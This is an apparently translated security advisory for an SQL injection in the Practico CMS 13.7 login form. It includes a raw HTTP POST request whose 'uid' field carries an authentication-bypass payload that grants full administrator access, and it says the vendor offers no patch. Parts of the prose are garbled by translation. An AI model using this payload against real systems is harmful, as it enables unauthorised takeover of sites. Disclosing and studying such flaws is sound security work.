Release date:
Updated on: 2013-09-19
Affected Systems:
Practico CMS 13.x
Description:
--------------------------------------------------------------------------------
Practico CMS is a visual framework for rapid creation and Web applications.
Practico CMS 13.7 does not verify the index correctly. the uid parameter of php (when "accion" is set to "Iniciar_login"), that is, it is used in SQL queries and can be operated by injecting arbitrary SQL code.
<* Source: shiZheni
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
######################################## ####################
#______________________________________
# | ____ | _ __| | ___ | ||||||||||||__ |__ |
# // | |\||||__ |||||||||
# // | |__ | ||\|__ ||||__ |__ |||||||
# // | _ | \ | _ | |__ |
# // ___ | |__ ___ \||||||__ ||\|__ | __
# | ______ | |__ | ______ | _____ |__ | |____ |__ | \___ | _____ |
#
######################################## ####################
# Exploit Title: Practico Login SQL Injection
# Date: 2013-08-12
# Exploit Author: shiZheni
# Software Link: http://www.codigoabierto.org/
# Software Download Link: http://sourceforge.net/projects/practico/files/
# Version: 13.7
# Afected Version: 13.7 <and Last
# Tested on: Window 7 and PHP 5.3.15
========================================================== ============
#1 [SQLi] Login-Admin (Total Access)
POST/demo/practico/HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Referer: http: // localhost/demo/practico/
Host: localhost
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accion = Iniciar_login & uid = admin % 27 + AND + 1% 3D1% 23 & clave = password & captcha = mrr6
This vulnerability give you total access and control in the CMS.
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Practico CMS
------------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://sourceforge.net/projects/practico/files/